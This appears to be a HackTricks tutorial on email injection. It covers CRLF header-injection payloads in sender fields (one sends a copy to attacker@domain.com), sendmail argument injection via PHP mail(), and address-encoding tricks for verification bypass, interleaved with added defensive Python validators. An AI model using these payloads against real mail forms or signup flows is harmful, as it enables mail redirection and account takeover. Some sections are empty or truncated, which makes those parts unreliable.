# Email Injections
Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
{% hint style="success" %}
Learn & practice AWS Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow us** on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## Inject in sent e-mail
### Inject Cc and Bcc after sender argument
```
From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
```
The message will be sent to the recipient and recipient1 accounts.
### Inject argument
```
From:sender@domain.com%0ATo:attacker@domain.com
```
The message will be sent to the original recipient and the attacker account.
### Inject Subject argument
```
From:sender@domain.com%0ASubject:This is%20Fake%20Subject
```
The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.
### Change the body of the message
Inject a two-line feed, then write your message to change the body of the message.
```
From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.
```
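As an added defensive example (my code, not from the original HackTricks page), the following Python snippet shows the check an application should run on a user-supplied value before it reaches a mail function: it URL-decodes the value twice (so a double-encoded `%250A` is caught as well as `%0A`), refuses anything containing CR, LF or NUL, and reports which header names an injected value would have added, which is useful for logging and alerting. The sample payloads are the ones shown above plus a raw-CRLF variant; all function names are mine.

```python
import re
from urllib.parse import unquote

# Constructed samples: the page's payloads (URL-encoded, as they would arrive in a
# form field) plus a benign value and a raw-CRLF variant.
SAMPLES = {
    "benign": "sender@domain.com",
    "cc_bcc": "sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com",
    "to": "sender@domain.com%0ATo:attacker@domain.com",
    "subject": "sender@domain.com%0ASubject:This is%20Fake%20Subject",
    "body": "sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.",
    "raw_crlf": "sender@domain.com\r\nBcc:recipient1@domain.com",
}

_LINE_CTRL = re.compile(r"[\r\n\x00]")                    # line terminators and NUL
_HEADER_NAME = re.compile(r"^[A-Za-z][A-Za-z0-9-]*\s*:")  # "Name:" at the start of a line

def _decode(value: str) -> str:
    """URL-decode twice so %250A (double-encoded LF) is caught as well as %0A."""
    return unquote(unquote(value))

def contains_header_injection(value: str) -> bool:
    """True if the value would terminate the current header line once decoded."""
    return _LINE_CTRL.search(_decode(value)) is not None

def injected_headers(value: str) -> list[str]:
    """Header names the injected value would add (empty for a body-only injection)."""
    lines = re.split(r"\r\n|\r|\n", _decode(value))
    names = []
    for line in lines[1:]:
        m = _HEADER_NAME.match(line)
        if m:
            names.append(m.group(0).rstrip(":").strip())
    return names

def safe_header(name: str, value: str) -> str:
    """Build a single header line, refusing values that could smuggle further headers."""
    if contains_header_injection(value):
        raise ValueError(f"header injection attempt in {name}: {injected_headers(value) or 'body'}")
    return f"{name}: {value}"

if __name__ == "__main__":
    for label, sample in SAMPLES.items():
        print(f"{label:9} injection={contains_header_injection(sample)} headers={injected_headers(sample)}")
```

Rejecting rather than stripping is deliberate: silently removing the line break would turn the injected `Bcc:` line into part of the `From` value, which is still not what the user meant and hides the attempt from the logs.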
### PHP mail() function exploitation
```bash
# The function has the following definition:
php --rf mail
Function [ function mail ] {
- Parameters [5] {
Parameter #0 [ $to ]
Parameter #1 [ $subject ]
Parameter #2 [ $message ]
Parameter #3 [ $additional_headers ]
Parameter #4 [ $additional_parameters ]
}
}
```
#### 5th parameter ($additional\_parameters)
This section is based on **how to abuse this parameter assuming an attacker controls it**.
This parameter is appended to the command line PHP uses to invoke the sendmail binary. However, it is sanitised with the function `escapeshellcmd($additional_parameters)`.
An attacker can therefore **inject extra parameters for sendmail** in this case: `escapeshellcmd` escapes shell metacharacters, but spaces and leading dashes pass through, so additional options still reach the binary.
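The following Python model is added here and is neither the page's code nor PHP's: `escapeshellcmd_like` approximates what PHP's `escapeshellcmd()` does (backslash-escape shell metacharacters and nothing more), `sendmail_argv` shows how the escaped value is still word-split into separate sendmail arguments, and `validate_additional_parameters` is the allowlist an application should apply instead, accepting only a single `-f<address>` envelope sender. `--injected-option` is a constructed placeholder, not a real sendmail flag.

```python
import re

# Approximation of the metacharacters PHP's escapeshellcmd() escapes. Note what is
# absent: space and '-', which is exactly what argument injection needs.
_SHELL_META = set("#&;`|*?~<>^()[]{}$\\\n\xff'\"")

def escapeshellcmd_like(value: str) -> str:
    """Rough model of PHP escapeshellcmd(): backslash-escape shell metacharacters only."""
    return "".join("\\" + c if c in _SHELL_META else c for c in value)

def sendmail_argv(additional_parameters: str) -> list[str]:
    """How the escaped value ends up as separate sendmail arguments after word-splitting."""
    return ["/usr/sbin/sendmail", "-t", "-i"] + escapeshellcmd_like(additional_parameters).split()

# Only an envelope sender (-f) with a conservative address syntax is legitimate here.
_ENVELOPE_SENDER = re.compile(r"-f[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")

def validate_additional_parameters(value: str) -> str:
    """Return value unchanged if it is exactly one -f<address>; raise otherwise."""
    if _ENVELOPE_SENDER.fullmatch(value) is None:
        raise ValueError("additional_parameters must be exactly -f<address>")
    return value

if __name__ == "__main__":
    # Constructed input: a valid envelope sender followed by a placeholder option.
    tainted = "-fbounce@example.com --injected-option"
    print("after escaping:", sendmail_argv(tainted))   # the extra option survives
    try:
        validate_additional_parameters(tainted)
    except ValueError as e:
        print("allowlist:", e)
```

The point of the model is that escaping targets the shell, while the risk here is the sendmail binary's own option parser; only a positive allowlist on the whole value addresses that.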
#### Differences in the /usr/sbin/sendmail implementation
The **sendmail** interface is **provided by the MTA email software** (Sendmail, Postfix, Exim etc.) installed on the system. Although the **basic functionality** (such as the -t -i -f parameters) remains the **same** for compatibility reasons, **other functions and parameters** vary greatly depending on the MTA installed.
Here are a few examples of the different man pages of the sendmail command/interface:
* Sendmail MTA: http://www.sendmail.org/\~ca/email/man/sendmail.html
* Postfix MTA: http://www.postfix.org/mailq.1.html
* Exim MTA: https://linux.die.net/man/8/exim
Depending on the **origin of the sendmail** binary, different options have been discovered that can be abused to **leak files or even execute arbitrary commands**. Check how in [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
## Inject in email name
{% hint style="danger" %}
Note that if you manage to create an account in a service with an arbitrary domain name (like Github, Gitlab, CloudFlare Zero trust...) and verify it by receiving the verification email at your mail address, you might be able to access sensitive areas of the victim company
{% endhint %}
### Ignored parts of an email
The symbols **+, -** and **{}** can in rare occasions be used for tagging and are ignored by most email servers
* Example: john.doe+intigriti@example.com → john.doe@example.com
**Comments between parentheses ()** at the beginning or the end are also ignored
* Example: john.doe(intigriti)@example.com → john.doe@example.com
### Whitelist bypass
### Quotes
### IPs
You can also use an IP as the domain name between square brackets:
* john.doe@\[127.0.0.1]
* john.doe@\[IPv6:2001:db8::1]
### Email Encoding
As explained in [**this research**](https://portswigger.net/research/splitting-the-email-atom), email names can also contain encoded characters:
* **PHP 256 overflow**: the PHP `chr` function keeps adding 256 to a character until it becomes positive and then applies the operation `%256`.
* `String.fromCodePoint(0x10000 + 0x40) // U+10040 → @`
{% hint style="success" %}
The goal of this trick is to end up with an injection like `RCPT TO:<"collab@psres.net>collab"@example.com>`\
which will send the verification email to a different address from the expected one (that is, introducing another email address inside the email name and breaking the syntax when the email is sent)
{% endhint %}
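An added example (mine, not from the page or the PortSwigger research) that serves both the "Ignored parts of an email" section above and the encoded-character tricks in this section: a canonicaliser a registration or SSO flow can run before trusting an address. It strips `+tag` subaddressing and leading/trailing `(comments)` the way a receiving server would, decodes RFC 2047 encoded-words (`=?charset?q|b?data?=`, the formats listed in the next block) found in the local part, and flags anything whose decoded form contains address delimiters, an IP-literal domain, or a punycode label. The sample addresses are the page's own plus one constructed to decode to `x@yhi`; `is_trusted_corporate_address` and the other names are mine.

```python
import base64
import quopri
import re

# Constructed sample addresses: the page's examples plus one built to decode to "x@yhi".
SAMPLES = [
    "john.doe+intigriti@example.com",
    "john.doe(intigriti)@example.com",
    "john.doe@[127.0.0.1]",
    "john.doe@[IPv6:2001:db8::1]",
    "=?utf-8?q?=41=42=43?=hi@example.com",
    "=?utf-8?b?QUJD?=hi@example.com",
    "=?utf-8?q?x=40y?=hi@example.com",
    "x@xn--svg/-9x6",
]

ENCODED_WORD = re.compile(r"=\?([^?]+)\?([qQbB])\?([^?]*)\?=")   # RFC 2047 =?charset?q|b?data?=
COMMENT = re.compile(r"^\([^)]*\)|\([^)]*\)$")                  # (comment) at start or end
IP_LITERAL = re.compile(r"^\[(?:IPv6:)?[0-9A-Fa-f:.]+\]$", re.IGNORECASE)
DELIMITERS = set('@<>"\\ ,;:()')   # characters that change how SMTP/RFC 5322 parse an address

def decode_encoded_words(text):
    """Decode every encoded-word in text. Returns (decoded_text, found_any)."""
    found = False
    def repl(m):
        nonlocal found
        found = True
        charset, enc, data = m.group(1), m.group(2).lower(), m.group(3)
        if enc == "q":
            raw = quopri.decodestring(data.encode("ascii"), header=True)
        else:
            raw = base64.b64decode(data)
        try:
            return raw.decode(charset)
        except (LookupError, UnicodeDecodeError):
            return raw.decode("latin-1")   # unknown charset: keep the bytes visible rather than fail
    return ENCODED_WORD.sub(repl, text), found

def canonicalize(address):
    """Normalise like a receiving server would and flag features that deserve rejection."""
    local, sep, domain = address.rpartition("@")
    if not sep or not local or not domain:
        raise ValueError("address must be local@domain")
    flags = []
    stripped = COMMENT.sub("", local)
    if stripped != local:
        flags.append("comment")
    local, had_encoded = decode_encoded_words(stripped)
    if had_encoded:
        flags.append("encoded-word")
        if any(c in DELIMITERS for c in local):
            flags.append("decoded-delimiter")   # decoded text could split the address
    local = local.split("+", 1)[0]              # +tag is delivered to the base mailbox
    if IP_LITERAL.match(domain):
        flags.append("ip-literal")
    domain = domain.lower()
    if any(label.startswith("xn--") for label in domain.split(".")):
        flags.append("punycode")
    return {"local": local, "domain": domain,
            "canonical": f"{local}@{domain}", "flags": flags}

def is_trusted_corporate_address(address, allowed_domains):
    """Allowlist check for verification/SSO flows: a plain mailbox on an allowed domain."""
    try:
        info = canonicalize(address)
    except ValueError:
        return False
    return not info["flags"] and info["domain"] in allowed_domains

if __name__ == "__main__":
    for sample in SAMPLES:
        info = canonicalize(sample)
        print(f"{sample:40} -> {info['canonical']:25} {info['flags']}")
```

The check compares the domain only after canonicalisation, so `john.doe+tag@example.com` is accepted as `example.com` while an address whose local part decodes to another `@`, or whose domain is an IP literal or punycode label, is refused outright rather than passed to a downstream parser that might split it differently.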
Different encodings:
```bash
# Format
=? utf-8 ? q ? =41=42=43 ?= hi@example.com --> ABChi@example.com
# =? -> Start of encode
# utf-8 -> encoding used
# ? -> separator
# q -> type of encoding
# ? -> separator
# =41=42=43 -> Hex encoded data
# ?= end of encoding
# Other encodings, same example:
# iso-8859-1
=?iso-8859-1?q?=61=62=63?=hi@example.com
# utf-8
=?utf-8?q?=61=62=63?=hi@example.com
# utf-7
=?utf-7?q??=hi@example.com
# q encoding + utf-7
=?utf-7?q?&=41?=hi@example.com
# base64
=?utf-8?b?QUJD?=hi@example.com
# base64 + utf-7
=?utf-7?q??=hi@example.com
#punycode
x@xn--svg/-9x6 → x@
```